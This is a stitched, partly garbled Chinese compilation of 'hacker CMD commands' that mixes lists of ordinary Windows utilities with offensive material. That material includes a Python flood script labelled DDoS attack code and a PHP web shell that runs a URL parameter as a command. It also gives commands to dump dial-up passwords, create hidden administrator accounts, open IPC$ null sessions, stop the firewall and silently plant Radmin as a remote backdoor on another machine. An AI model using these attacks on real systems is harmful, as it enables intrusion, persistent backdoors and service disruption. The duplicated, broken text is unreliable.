黑客常用CMD命令大全

如何使用Windows CMD命令进行网络安全设置在当今信息时代，网络安全问题备受关注。

随着互联网的快速发展，我们的个人信息和数据面临着越来越多的威胁。

为了保护我们的网络安全，我们可以利用Windows CMD命令进行一些基本的网络安全设置。

本文将介绍一些常用的CMD 命令，帮助您加强网络安全。

1. 修改默认管理员账户名称和密码默认情况下，Windows系统的管理员账户名称为“Administrator”，这是黑客们常常攻击的目标。

为了增加安全性，我们可以通过CMD命令修改默认管理员账户的名称和密码。

首先，打开CMD命令提示符，输入以下命令来修改管理员账户名称：```net user Administrator 新用户名```其中，“新用户名”是您想要设置的新管理员账户名称。

接下来，我们可以使用以下命令来修改管理员账户的密码：```net user Administrator 新密码```请将“新密码”替换为您想要设置的新密码。

2. 禁用或启用Windows防火墙Windows防火墙是保护计算机免受网络攻击的重要工具。

然而，在某些情况下，我们可能需要禁用或启用Windows防火墙。

要禁用Windows防火墙，可以使用以下命令：```netsh advfirewall set allprofiles state off```这将关闭所有配置文件中的防火墙。

要启用Windows防火墙，可以使用以下命令：```netsh advfirewall set allprofiles state on```这将打开所有配置文件中的防火墙。

3. 修改本地安全策略本地安全策略是Windows系统提供的一种控制用户访问和权限的工具。

通过CMD命令，我们可以修改本地安全策略来加强系统的安全性。

首先，打开CMD命令提示符，输入以下命令来打开本地安全策略编辑器：```secpol.msc```在本地安全策略编辑器中，您可以修改密码策略、账户策略、用户权限等。

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executableactmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口（终端服务）chgusr.exe > 改变用户（终端服务）chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引内容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的！cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的内容＊compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦！dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具edlin.exe > 命令行的文本编辑器（历史悠久啊！）edlin.exe > 命令行的文本编辑器（历史悠久啊！）esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration tool evntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在内存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a network connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote sy stems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

cmd.exe是一个命令扩展接口，外面利用它可以执行系统的环境变量下的任意可执行程序，操作类似与以前的ms-dos，但功能却比ms-dos要强大的多，虽然学习有点抽象，但我们只要把ms-dos的基础打好，也很容易上手，如果各位对dos命令很陌生的话，就先去补习一下dos命令再来看本文，如果文章前那位是位system高手，就请掠过次页吧，好了不多说废话，请看下面：一、外部命令：1、 atmadm.exe：打开ATM调用管理器，-c表示列出所有连接、-s表示只显示统计、-a表示列出所有注册的连接地址。

2、 arp.exe：查看和修改本地ARP（地址解析协议）表项命令，/a 显示当前网络接口和当前的ARP表、/d 删除指定的IP的ARP表、/s 添加有IP地址和MAC地址指定的ARP表。

在使用ARP命令是通常是先PING 对方或网关的IP地址。

3、 attrib.exe：文件属性设置，+代表设置属性、-代表取消属性、/s代表设置当前目录和子目录文件（支持通配符）、/d代表设置文件夹（支持通配符），设置选项如下：a 存档属性、s 系统属性、h 隐藏属性、r 只读属性。

比如给c:\windows所有目录及子目录加系统、隐藏属性，命令如下：attrib +s +dc:\windows\*.* /s /d 。

4、 auditusr.exe：设置每用户审核策略，/is 添加或更改成功策略审核、/if 添加或更改失败策略审核、/r 删除所有安全策略审核、/ra 删除所有用户策略审核、/e 将当前用户策略审核配置导出到文件、/i 从文件导入用户策略审核配置。

5、 blastcln.exe：微软的恶意程序移除工具命令行程序，只有/v参数，运行后会检测系统服务、系统程序、注册表启动项、被病毒破坏或丢失的文件名等等。

检测完毕之后会给出报告。

6、 bootcfg.exe：系统启动项配置程序，考虑到参数众多又对外面无多么大实际作用，大家可以输入bootcfg.exe /?参见其的中文命令参数帮助。

简单的黑客装逼代码引言黑客是计算机技术领域中的精英，他们擅长通过技术手段获取未授权的信息或者入侵他人的计算机系统。

黑客行为通常是非法的，违反了计算机安全和道德规范。

然而，在某些场合下，人们可以使用一些简单的黑客装逼代码来展示自己对计算机技术的了解和能力。

本文将介绍一些简单的黑客装逼代码。

1. DDOS攻击代码DDOS（分布式拒绝服务）攻击是一种通过同时向目标服务器发送大量请求以使其崩溃或无法正常工作的攻击方式。

以下是一个简单的DDOS攻击代码示例：import sockettarget_ip = "目标IP地址"target_port = 80def ddos_attack():while True:try:s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((target_ip, target_port))s.sendto(("GET /" + target_ip + " HTTP/1.1\r\n").encode('ascii'), (target_ip, target_port))s.close()except:passif __name__ == "__main__":ddos_attack()上述代码使用Python语言编写，通过创建一个socket连接并向目标IP地址发送大量请求来实现DDOS攻击。

请务必在合法授权的情况下使用此代码，遵守法律和道德规范。

2. 网站后门代码网站后门是黑客经常使用的一种技术手段，它允许黑客绕过正常的访问控制机制，获取对网站的非法访问权限。

以下是一个简单的网站后门代码示例：<?phpif(isset($_GET['cmd'])){$output = shell_exec($_GET['cmd']);echo "<pre>$output</pre>";}>上述PHP代码创建了一个简单的网站后门，当用户通过URL传递cmd参数时，该参数将被当作命令执行，并将结果输出到网页上。

黑客常用入侵命令控制面版：运行>>>>>>>>>>>:control计算机管理：command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务：net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如：)结束进程：NET SHARE查看版本：ver查看中端(服务）：net start查看文件：dir查看3389：加用户：c:\winnt\system32>net user adminserver$ admin /add提权限：net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令：telnet 主机IP踢人：logoff ID查看当前人：query user打开telnet:net start telnettelnet连接工具：OpenTelnet删除共享：net share c$=c:\删除共享：net share c$ /del启用GUEST：net user guest /active:yes为GUEST设密码：net user guest 888888提升到管理员：net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号：ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向：f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下：c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。

cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executable actmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口（终端服务）chgusr.exe > 改变用户（终端服务）chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的！cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的容＊compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦！dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具 edlin.exe > 命令行的文本编辑器（历史悠久啊！）edlin.exe > 命令行的文本编辑器（历史悠久啊！）esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration toolevntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a networ k connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态，显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。

八个cmd常用网络命令（黑客常用）一、ping它是用来检查网络是否通畅或者网络连接速度的命令。

作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。

下面就来看看它的一些常用的操作。

先看看帮助吧，在DOS窗口中键入：ping /? 回车。

所示的帮助画面。

在此，我们只掌握一些基本的很有用的参数就可以了（下同）。

-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。

试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP 就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。

-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。

结合上面介绍的-t参数一起使用，会有更好的效果哦。

-n 定义向目标IP发送数据包的次数，默认为3次。

如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。

说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如"ping IP -t -n 3"，虽然使用了-t参数，但并不是一直ping 下去，而是只ping 3次。

另外，ping命令不一定非得ping IP，也可以直接ping 主机域名，这样就可以得到主机的 IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小 。

从TTL的返回值可以初步判断被 ping主机的操作系统，之所以说"初步判断"是因为这个值是可以修改的。

用DOS，可别不知道DOS在哪里运行，有好几种方法1.开始菜单---程序---附件---命令提示符2.开始菜单---运行---打命令CMD一、常用DOS命令(1)cd.. cd.. 退到次一级目录cd\ cd\ 退到根目录下的意思cd 文件夹名字cd windows 进入WINDOWS目录(2)md 文件夹名字md win 建立名为win的文件夹(3)rd 文件夹名字rd win 删除名为win的文件夹（前提是win里没有任何文件）(4)copy 路径下文件目标路径copy C:\1\mima.txt C:\2\ 拷贝文件(5)del 目标路径下文件del C:\1\3\TCP.txt 删除文件del c:\1 删除c盘1目录所有文件看见没mima.txt被删除了但是3这个文件夹还没删除只是文件不会删除ghost里其他文件夹里的东西。

(6)dir 文件夹名字或盘符dir c:\windows 查看C盘windows里目录文件----------------------------------------------------------------------------│dir/W：宽屏显示，一排显示5个文件名，而不会显示修改时间，文件大小等信息；││dir/S：显示当前目录及其子目录下所有的文件，││dir/a 查看所有文件包括隐藏文件dir c:\windows /a ││dir/p 分页查看这里的很实用的,大家一定要自己试试│-----------------------------------------------------------------------------(为了节省大家的时间,方框里面的我就不介绍了,大家自己试试)(7)format 盘符格式化硬盘（这个我就不演示了.你问我为什么,汉.........我心疼我的硬盘^_^）(8)ren 文件名文件名改名ren 1.bat 2.bat 将1.bat改名为2.bat 这几个文件我还没创建,现在我们创建一下,好了(9)type 文件名查看文件内容（一般用来看bat或txt文件）(10)cls 清屏（没多大用）二、常用网络DOS命令(11)fport 查看系统端口和端口上运行的程序这个命令我也不知道怎么了,等我查一下用法,发到论坛上,不好意思,(12)netstat -an 查看所有连接本机IP(13)ipconfig /all 查看所有连接本机IP(14)telnet IP 端口连接对方机器某个端口(15)net user 查看本机用户net user 用户名密码/add 建立一个用户net user 用户名/del 删除一个用户(16)net localgroup administrators 用户名/add 把用户添加到管理员net localgroup administrators 用户名/del 把用户从管理员组删除这个就不用演示了,和上面的一样三、批处理文件批处理。

在日常中我们使用 windows 查看或连接无线，我们只需点开 internet 访问，即可轻松查看和选择我们所要连接的无线网络。

但在某些特定场景下，我们只能使用 cmd 窗口进行操作时，那么我们又该如何进行 wifi 的正常查看及连接呢？下面，我将教大家一些操控 wifi 的实用命令。

打开我们 windows 下的 cmd 终端窗口，输入如下命令查看周围可用 wifi : netsh wlan show networksmode=bssid20161113082441如果想要进行无线网络的连接，我们需要使用到配置文件。

输入以下命令查看配置文件：netsh wlan show profiles20161113084230指定所需配置文件及 ssid 后，进行连接。

命令如下：netsh wlan connect ssid=XXXXX name=XXXXX20161113084043断开连接：netsh wlan disconnect20161113084628将配置文件以 XML 格式导出并保存在本地：20161113084908按服务集标识符 (SSID) 向无线允许或阻止列表中添加无线网络：注：如果 permission 为 allow 或 block，则 ssid 参数是必需的。

如果permission 为 denyall，则不指定 ssid 参数。

过滤列表中指定无线网络：netsh wlan add filter permission=block ssid=XXXXX networktype=infrastructure20161113085328过滤列表中所有无线网络：netsh wlan add filter permission=denyall network=infrastructure20161113090620将被阻止的网络设为显示：netsh wlan set blockednetworks display=show20161113093224显示已安装的网卡驱动属性：netsh wlan show drivers20161113091152转载请注明：即刻安全 » CMD下的黑客WiFi操控命令。

⿊客攻击常⽤CMD命令⼤全⿊客常⽤命令⼤全net user heibai lovechina /add 加⼀个heibai的⽤户密码为lovechinanet localgroup Administrators heibai /add 把他加⼊Administrator组net start telnet 开对⽅的TELNET服务net use z:\127.0.0.1c$ 映射对⽅的C盘net use \\ip\ipc$ " " /user:" " 建⽴IPC空链接net use \\ip\ipc$ "密码" /user:"⽤户名" 建⽴IPC⾮空链接net use h: \\ip\c$ "密码" /user:"⽤户名" 直接登陆后映射对⽅C：到本地为H:net use h: \\ip\c$ 登陆后映射对⽅C：到本地为H:net use \\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对⽅到本地的为H:的映射net user ⽤户名　密码　/add 建⽴⽤户net user 查看有哪些⽤户net user 帐户名查看帐户的属性net user guest /active:yes 将Guest⽤户激活net user guest lovechina 把guest的密码改为lovechinanet user ⽤户名 /delete 删掉⽤户net user guest/time:m-f,08:00-17:00 表⽰guest⽤户登录时间为周⼀⾄周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表⽰guest⽤户登录时间为周⼀4:00/17:00,周⼆13:00/15:00,周三⾄周五8:00/17:00.net user guest/time:all表⽰没有时间限制.net user guest/time 表⽰guest⽤户永远不能登录. 但是只能限制登陆时间，不是上⽹时间net time \\127.0.0.1 得到对⽅的时间，get c:\index.htm d:\ 上传的⽂件是INDEX.HTM，它位于C:\下，传到对⽅D:\copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘net localgroup administrators ⽤户名 /add 把“⽤户”添加到管理员中使其具有管理员权限,注意：administrator后加s⽤复数net start 查看开启了哪些服务net start 服务名　开启服务；(如:net start telnet， net start schedule)net stop 服务名停⽌某服务net time \\⽬标ip 查看对⽅时间net time \\⽬标ip /set 设置本地计算机时间与“⽬标IP”主机的时间同步,加参数/yes可取消确认信息 net view 查看本地局域⽹内开启了哪些共享net view \\ip 查看对⽅局域⽹内开启了哪些共享net config 显⽰系统⽹络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "⽂本信息" 向对⽅发信息net ver 局域⽹内正在使⽤的⽹络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C：共享net user guest 12345 ⽤guest⽤户登陆后⽤将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端⼝,常⽤netstat -annetstat -n 查看端⼝的⽹络连接情况，常⽤netstat -annetstat -v 查看正在进⾏的⼯作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使⽤情况（查看tcp/ip协议使⽤情况）netstat -s 查看正在使⽤的所有协议使⽤情况nbtsta* -* ** 对⽅136到139其中⼀个端⼝开了的话，就可查看对⽅最近登陆的⽤户名（03前的为⽤户名）-注意：参数-A要⼤写tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”⽤于设置超时间隔。

要成为真正黑客必须掌握的**技术|黑客常用CMD命令只要删除这些就可以了有些系统NT装置在D盘或其他盘，就要把C改成其他盘。

1NET只要你拥有某IP用户名和密码，那就用IPC$做连接吧!这里我假如你得到用户是hbx密码是123456假设对方IP为127.0.0.1netus\\127.0.0.1\ipc$"123456"/user:"hbx"退出的命令是netus\\127.0.0.1\ipc$/delte下面的操作你必需登陆后才可以用.登陆的方法就在上面.----------------------下面我讲怎么创建一个用户，由于SA 权限相当于系统的超级用户.加一个heibai用户密码为lovechinanetuserheibailovechina/add只要显示命令胜利，那么我可以把他加入Administr组了.netlocalgroupA dministrheibai/add----------------------这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.这里把对方的C盘映射到外地的Z盘.netusz:\\127.0.0.1\c$----------------------netstarttelnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活，guestNT默认用户，而且无法删除呢?不知道是否这样，2000就是删除不了netuserguest/active:yes----------------------这里是把一个用户的密码改掉，把guest密码改为lovechina其他用户也可以的只要有权限就行了呀!netuserguestlovechinanet命令果然强大啊!2:at一般一个**者**后都会留下后门，也就是种木马了把木马传了上去，怎么启动他呢?那么需要用AT命令，这里假设你已经登陆了那个服务器。

十个最危险的cmd代码标题：十个最危险的CMD代码：保护个人电脑安全的必知事项引言：计算机操作系统的命令行界面（CMD）常常被用于执行各种任务和处理计算机操作。

然而，有些CMD代码可能带有潜在的危险性，可能导致个人电脑系统受到损害或被黑客入侵。

本文将介绍十个最危险的CMD代码，并提供逐步指导，以确保您的个人电脑安全。

第一部分：了解CMD代码的危险性首先，我们需要了解为什么这些CMD代码会被认为是危险的。

很多CMD 代码可以访问操作系统底层，以及系统文件和其他与系统安全相关的设置。

此外，某些CMD代码可以针对个人电脑进行攻击，包括删除文件、更改设置和入侵网络等。

第二部分：十个最危险的CMD代码详解1. format：这个命令用于格式化磁盘驱动器，将其中的数据全部清空。

格式化后，所有数据都将无法恢复。

慎用此命令，以免丢失重要文件。

2. del：此命令用于删除文件和文件夹。

如果使用不当，可能会不小心删除重要文件。

在执行此命令前，请仔细检查要删除的内容。

3. regedit：regedit允许用户访问和更改注册表，这是存储操作系统和应用程序重要设置的地方。

误操作可能导致系统不稳定，造成数据丢失。

4. shutdown：shutdown命令用于关闭或重启计算机。

误操作可能导致未保存的工作丢失，因此在使用此命令之前，请确保已保存所有重要的文件和数据。

5. assoc：此命令用于更改文件关联。

如果您无意更改文件的默认关联程序，可能会导致错误的应用程序打开文件，或者在打开某些文件时发生错误。

6. taskkill：taskkill命令用于结束正在运行的任务和进程。

在使用此命令之前，请确保了解哪些任务和进程可以结束，以避免关闭重要的系统进程。

7. netstat：这个命令用于列出当前计算机上的网络连接。

虽然对于识别网络问题非常有用，但也可能泄露计算机上的敏感信息，因此请慎重使用。

8. attrib：attrib用于修改文件和文件夹的属性，包括隐藏、只读和系统属性。

net use $">\\ip\ipc$ " " /user:" " 建立IPC空链接net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:net use h: $">\\ip\c$ 登陆后映射对方C：到本地为H:net use $">\\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务；(如:net start telnet，net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C：共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况，常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 